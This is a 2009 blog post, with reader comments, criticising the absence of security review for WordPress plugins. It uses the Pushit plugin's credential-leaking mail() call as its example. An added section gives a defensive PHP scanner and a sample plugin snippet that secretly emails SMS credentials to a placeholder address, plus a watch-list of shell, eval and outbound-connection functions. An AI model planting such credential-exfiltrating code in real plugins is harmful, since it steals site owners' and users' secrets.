
The Fear of WordPress Plugins

There’s been a nagging thought in the back of my head ever since I started writing WordPress plugins; the apparent lack of oversight in the WordPress plugin distribution system. I’m not trying to create hype around anything, I really do like WordPress, but I’m worried about the implications of zero oversight.

Lack of Oversight

It would be trivially simple to add an algorithm to a plugin to do all sorts of nefarious things. Off the top of my head I can imagine the following:

  1. Send a blog's comment data (email addresses) to an external server.
  2. Add an admin account or change an existing password.
  3. Hell, even delete the entire database and files.

Not a happy thought is it?

Attempting such a thing from a new plugin, with zero initial interest, would be nearly impossible because of the noise from all the other plugins. I say nearly impossible because there was recently a case of a plugin, called Pushit, which sent an email containing passwords to a Gmail account upon execution. I first heard about this from a post on Mental Fruition asking the question “Are your WordPress plugins safe?”.

In doing some research on connecting WordPress to SMS gateways for some mobile action, I found what is either a careless remnant of testing or a malicious attempt to steal data from people using a WordPress plugin. Actually, make that carelessly malicious.

Interested in how the Pushit plugin for WordPress was working behind the scenes, I stumbled upon quite a shocker:
…

Yet towards the end of this send function, there’s a call to PHP’s mail function. It sends the following to smart.maxx@gmail.com:

  • receiving number
  • message sent
  • username of SMS service account
  • password of SMS service account
  • the short number used
  • the sender name/number to be displayed on the receiving mobile
  • whether the SMS was sent OK

Apparently the authors of this plugin deem that this information is something that someone with the e-mail address smart.maxx@gmail.com should have about every SMS you, or your visitors, attempt to send using their plugin. Are you cool with that?

No, I’m not cool with that and I don’t know anyone who would be cool with that.

Thankfully, the Pushit plugin was only downloaded around 200 times before the issue was discovered. It should be noted that the developer of the plugin swears that it was an honest mistake; the mail() call was leftover code from testing apparently. This doesn’t invalidate the fear though.

No, the fear is from an existing, popular, plugin being compromised and distributed. This is the nightmare scenario.

Take wp-click-track (my most popular plugin) for example. To date, it’s been downloaded a couple thousand times and it’s been written up on a few sites. Were I evil, and my girlfriend says the jury’s still out on that :) , I could easily compromise quite a few sites with a simple update. Quite the scary thought isn’t it?

I know it would be nearly impossible to protect WordPress from malicious code because plugins are written in PHP and, because of that, have access to all the resources WordPress does. PHP can’t be sandboxed, so manual screening would be pretty much required.

The fact that there isn’t any manual screening to date is surprising though. WordPress is owned by Automattic, which has received at least 29.9 million dollars in funding so they have money. Just look at it: $29,900,000. That’s a lot of money so it’s pretty tough to understand the argument, if it was used, that there just isn’t money available for a person to provide manual oversight.

That is inexcusable.

I’m not saying it would be easy by any means, but if a company has 29, fucking, million dollars based on the back of a shoddy system there’s no reason why they couldn’t spend some money adding oversight to the plugin system.

As mentioned above, since WordPress plugins are written in raw PHP they have full access to all the functionality WordPress does, so solving this issue programmatically would be nearly impossible. No, without using some sort of meta language, similar to Smarty, manual oversight is probably the only solution.

At the very least take 2-4 programmers, or, hell, one really talented programmer, and have them write a couple scripts to parse the plugin SVN repository looking for suspicious function calls (rm(), mail(), exec(), etc.) and algorithms (DROP TABLE) and have the programmer intervene manually if anything suspicious is detected.
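As an added example (not code from this post, from the Pushit plugin, or from WordPress.org), here is a small static scanner of the kind the paragraph above proposes, run against a constructed plugin fragment that mirrors the mail() problem quoted earlier. It tokenizes PHP with token_get_all() rather than grepping, so a mail() inside a comment or a string literal is not counted; it flags a watch-list of functions and destructive SQL inside string literals. The watch-list, the regex, the sample plugin and the address in it are all constructed for the example; every hit is a lead for a human reviewer, not a verdict.

```php
<?php
// Added example, not code from the post or from WordPress.org: a "suspicious
// call" scanner for a plugin checkout. Findings are meant for manual review.
declare(strict_types=1);

// Constructed watch-list; tune it to what your review process cares about.
const WATCHED_FUNCTIONS = [
    'mail', 'wp_mail',                                   // data leaving the site by email
    'exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'popen',
    'eval', 'create_function',                           // dynamic code execution
    'base64_decode', 'gzinflate', 'str_rot13',           // common obfuscation wrappers
    'unlink', 'rmdir', 'file_put_contents',              // filesystem writes and deletes
    'curl_exec', 'fsockopen', 'wp_remote_post',          // outbound connections
];
// Destructive SQL a blog plugin very rarely has a reason to run.
const DESTRUCTIVE_SQL = '/\b(DROP\s+(?:TABLE|DATABASE)|TRUNCATE\s+TABLE)\b/i';

// Index of the nearest non-whitespace token before (step -1) or after (step +1) $i.
function neighbour(array $tokens, int $i, int $step): ?int
{
    for ($j = $i + $step; $j >= 0 && $j < count($tokens); $j += $step) {
        if (!is_array($tokens[$j]) || $tokens[$j][0] !== T_WHITESPACE) {
            return $j;
        }
    }
    return null;
}

/** Scan one PHP source string; returns a list of ['file', 'line', 'reason'] findings. */
function scan_source(string $file, string $source): array
{
    $findings = [];
    $tokens = token_get_all($source);
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            continue;                       // single-character tokens such as '(' or ';'
        }
        [$id, $text, $line] = $tok;

        // Destructive SQL hidden in a string literal, e.g. "DROP TABLE wp_posts".
        if ($id === T_CONSTANT_ENCAPSED_STRING && preg_match(DESTRUCTIVE_SQL, $text, $m)) {
            $findings[] = ['file' => $file, 'line' => $line, 'reason' => "SQL '{$m[1]}' in string literal"];
            continue;
        }

        // A watched name counts as a call only when '(' follows it and it is
        // neither a method call ($x->mail()) nor a definition (function mail()).
        $isName = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $name = strtolower(ltrim($text, '\\'));
        if (!$isName || !in_array($name, WATCHED_FUNCTIONS, true)) {
            continue;
        }
        $next = neighbour($tokens, $i, +1);
        $prev = neighbour($tokens, $i, -1);
        $notAPlainCall = $prev !== null && is_array($tokens[$prev])
            && in_array($tokens[$prev][0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true);
        if ($next !== null && $tokens[$next] === '(' && !$notAPlainCall) {
            $findings[] = ['file' => $file, 'line' => $line, 'reason' => "call to {$name}()"];
        }
    }
    return $findings;
}

/** Walk a plugin checkout (an SVN working copy, say) and scan every .php file in it. */
function scan_directory(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $info) {
        if ($info->isFile() && strtolower($info->getExtension()) === 'php') {
            $path = $info->getPathname();
            $findings = array_merge($findings, scan_source($path, file_get_contents($path)));
        }
    }
    return $findings;
}

// Constructed sample in the shape of the quoted incident: a send helper that
// quietly emails the service credentials to a hard-coded (placeholder) address.
$sample = <<<'PHP'
<?php
function sms_send($number, $message, $user, $pass) {
    $ok = sms_gateway_post($user, $pass, $number, $message);
    // mail('nobody@example.com', 'debug', 'commented out, must not be flagged');
    mail('developer@example.com', 'sms debug', "$number $message $user $pass $ok");
    return $ok;
}
PHP;

// Usage: php scan.php /path/to/plugin-checkout   (no argument scans the sample above)
$findings = isset($argv[1]) ? scan_directory($argv[1]) : scan_source('sample-plugin.php', $sample);
foreach ($findings as $f) {
    echo "{$f['file']}:{$f['line']}: {$f['reason']}\n";
}
```

Run without arguments it reports the live mail() call on line 5 of the sample and stays silent on the commented-out one on line 4; pointed at a checkout directory it prints one line per hit so a reviewer can open the file at that line. A scanner like this is deliberately noisy (wp_mail() has plenty of legitimate uses), which is exactly why the post pairs it with a person who looks at what it flags.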

Heal thyself WordPress. Now.



Tags: wordpress, wordpress plugin

This entry was written by Eric Lamb and posted on Monday, July 13th, 2009 at 5:00 am and is filed under Brain Dump. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

11 Comments

  1. eldris says:
    July 13, 2009 at 6:15 am

    I agree, WordPress should implement stricter security in relation to plugins. In fact, WordPress 2.8.1 supposedly does add a bit more security, although I have no idea what changed, except that now one of my plugins requires I select and enable option every time it updates, but I’m not sure if that’s related.

    One thing WordPress could do, if they aren’t already, is implement a system like Apple have for iPhone apps, where they inspect any new or updated code. If WordPress “distribute” plugins they should take a bit more responsibility for their content.

    You’ve definitely made me think. I’m going to have to go through the code for all my plugins now, and I use a lot.

    Really what scares me most is, what if someone hacked a plugin creator’s WordPress.org account and sent out a malicious update for a well used plugin?

    • Eric Lamb says:
      July 13, 2009 at 3:58 pm

      Amazingly, I had the exact same fear about my account being compromised but I thought it might be a bit… much to add that in the post. Thanks for bringing it up because it most certainly deserves to be thought about :)

  2. redwall_hp says:
    November 3, 2009 at 5:43 pm

    1. This all applies to desktop software as well. Should Apple or Microsoft have to review and approve software before it can be distributed to users?

    2. Would you rather have this minor risk, or would you rather have WordPress Extend become something like the iPhone App Store?

    3. This is just further reason for people to move towards “premium” plugins. Pay for your plugins and you won’t have the problem. The software will be better maintained, and the developers wouldn’t have the temptation to add in malware.

    • Eric Lamb says:
      November 3, 2009 at 7:36 pm

      Hi redwall_hp (a pseudonym?),

      1. I guess it could apply to desktop software but you’ve got to admit it’s quite the leap we’re making. Kudos on making the connection with what I was saying: there should be some oversight of WordPress plugins to: all software should have oversight. :)

      2. You ask that like those are the only two options (plus I disagree with this being a minor risk). Instead, what about how Google handles the Android store? Google handles the review process post-hoc so there is no cluster fuck like the iPhone.

      3. Wow. Um, no, I don’t think paying for the plugins is the answer either. I write two free plugins without making a cent and I believe they are both very well maintained and I have never, ever, had the urge to add in malware.

      No disrespect, but I notice you’re a WP plugin developer. Are you saying your plugins aren’t maintained and you’ve put malware in? I bet the answer is an emphatic NO OF COURSE NOT (along with an appropriate amount of insults I’d wager). The point is that I don’t think there’s any more “honor” or desire for quality for so called premium plugins (McDonalds charges but it’s a far cry from even a basic definition of “good” for example).

      At this point I’m really thinking the bare minimum answer is a little bot to parse the plugins looking for “suspicious” strings or function calls. Or something similar; I have faith that Automattic are smart people and can figure it out if they wanted to. I just don’t think they do.

      • redwall_hp says:
        November 6, 2009 at 9:25 pm

        Yes, it’s a pseudonym. It would be a rather odd name.

        1 & 2. I think that they should be able to roll back the published version of a plugin in the repo if a patch contains actual malware. (After the fact though, I don’t want any pre-release approval for each update like with the iPhone.) I think that should be the extent of it though. But on the other hand, I don’t really think it’s necessarily their responsibility. I still say that falls upon the end user. If you download malware, it’s kinda your fault. (The same goes for anyone who installs malware on their computer because a site said they needed to install a bogus ActiveX control.)

        3. [Insert "emphatic NO OF COURSE NOT" and insults here] I actually haven’t been doing a whole lot of active development on the plugins at the moment, aside from working on bug fixes and making sure everything works with new releases of WordPress. I’m planning to eventually scrap and rewrite a couple of them and make them paid (but GPL still). Why? Because I can’t take the support anymore. I’ve pretty much stopped checking my support inbox now. I can’t spend hours helping people for nothing. I get an occasional small donation, but the ratio isn’t very good. (And I certainly shouldn’t have to put up with people *demanding* that I help them style something so it works better with their theme, and sending multiple emails because I didn’t respond within the hour.) Too much work, stress, and headache.

        Charging a modest sum in some manner (whether it be paying for the plugin itself, for support, or something else) should help cut down on that kind of crap and allow me to actually put time into developing the plugin, and helping people who care enough to support the development. There are a few developers, such as Gravity Forms, who are doing something along similar lines now, and it’s working well for them.

        It works like this: Provide an awesome product (and be trustworthy) and people will pay. If you don’t deliver, then people won’t pay. You can’t have better motivation than that.

        I don’t quite buy the McDonalds metaphor though. McDonalds may not be the best food, but the alternative “better food” certainly isn’t free. McDonalds is closer to the free end of the spectrum than a restaurant with better food…

        • Eric Lamb says:
          November 6, 2009 at 10:25 pm

          Odd name? Or the Best. Name. Ever. Like a D&D character. Redwall. Have to drop the HP though :)

          1&2: That’s not a bad idea man; no idea how to get Automattic to implement it in WordPress but still a good idea. Maybe a plugin scanner / profiler would make for a good security plugin? Might make a good premium plugin.

          I realize there’s technically no legal responsibility for Automattic to do anything about this issue but I do believe there’s a moral responsibility (which I know is a weak, weak, argument). Automattic built a system that allows third party developers to have their code installed with the click of a link if that code is hosted by Automattic / WordPress.

          I’m not talking about all plugins here; those that are downloaded from a separate site are used at the users risk (though the plugin author is still responsible for any repercussions whether they own up to it or not). This may seem a bit of a double standard, and honestly, I accept that it probably is, but Automattic is a multi-million dollar organization that puts out the code millions of people rely on. It seems to me that there is a “trust” imbued by the plugins that come from Automattic that they are approved by WordPress. It hardly seems appropriate for Automattic to do nothing to protect their users from the very plugin eco system they themselves created and profit from.

          Wah Wah!! I know. Sigh…

          3. Dude, I feel your pain on the constant requests. At least 10 times a month I get emails from users demanding my help on their project. It. Does. Get. Old.

          I do try and help those users that have a new issue (something not covered in the docs or a previous comment) but, honestly, my plugins just aren’t that popular (5,000 downloads or something like that).

          I definitely believe there is a market for some premium plugins; I just don’t think lack of quality was one of them. Some plugins are so complicated and useful that to not get paid wouldn’t be cool. To be honest, I wish I would have gone the premium route for wp-click-track. So much work goes into it to make it better and better and better (which I think I’ve done from 0.1 to the current 0.6) that I would be way more motivated and productive if there was cash involved :)

          I would be careful about charging for anything that has a GPL license on it. The way I understand the GPL (please correct me if you know better) is that with the GPL license anyone who purchased the code can then release it for free under a different name so long as the code continues to be released. I like GPL just not for $$ projects.

          Yup, the McDonalds metaphor wasn’t good or even applicable. Just a weak metaphor. Let us never speak of it again.

  3. Chuck says:
    January 6, 2010 at 4:35 pm

    Outstanding post. I never even thought of this. I encourage people to keep plugins down to a minimum for possible conflicting plugins, but it never crossed my mind that some “evil” person could really do some serious damage.

    And yes, with that kind of cash rolling in there is no excuse for not having some sort of oversight. You just gave me a post subject, and I will most certainly include links to your post, and the posts that you included in your article. Thanks again for the heads up. “-)

    Side note: I found your site on the blogging sub-Reddit.

    • Eric Lamb says:
      January 7, 2010 at 4:15 pm

      Hi Chuck,

      Thanks for the props man; I’m glad you found this topic worthwhile enough to write about.

      My biggest issue with Automattic not doing anything about this is that it’s such an easy to reach, low hanging, fruit for a company with the level of funding they have. Hopefully they’ll do something about this, but my experience tells me they won’t.

      Thanks again
      Eric

  4. @donpower says:
    January 7, 2010 at 3:05 am

    Arrived here via Twitter link from Chuck, above.

    I always thought the same potential for malice exists with Twitter apps. People willingly give up their Twitter password to “get more followers” or “manage their followers” or to “tweet your buddy a beer” but does anyone ever stop to think about what these apps could be doing?

    There’s no way to gauge or prove it but I would venture to say that AT LEAST 30% of Twitters have the same password on Twitter as they do for Facebook and perhaps even for their main Email address. Once a hacker has one valid password (plus all your demographic data scraped from Facebook and other social apps) they can much more easily start hacking all your other accounts as well…

    So, to the consumers of FREE I say…”Buyer Beware!”

    - Don

    • Eric Lamb says:
      January 7, 2010 at 4:22 pm

      Hi @donpower,

      I agree completely about sharing passwords with any online service; don’t. Ever. A few years ago this was a rampant issue, with all sorts of sites being bold enough to ask. Now some sites do still process account joining (is that the right term?) through their own servers but thanks to tools like Oauth it’s become less and less of a commonality. Personally, I do use Oauth for a few Twitter integration projects I use but that’s because it’s, mostly, obvious that I’m not sharing the info with anyone.

      That being said I am extremely disturbed whenever a site asks me for my email account info like LinkedIn does (whereby they grab my contact list). I Just. Don’t. Trust. Them.

      Thanks for stopping by; ironically I enjoy your blog so I’m glad I could reciprocate :)

      Eric

  5. @donpower says:
    January 7, 2010 at 4:28 pm

    Yah – reciprocity is neat. I got your comment on my blog too – thx!

    See you around the posts, Eric!

    - Don

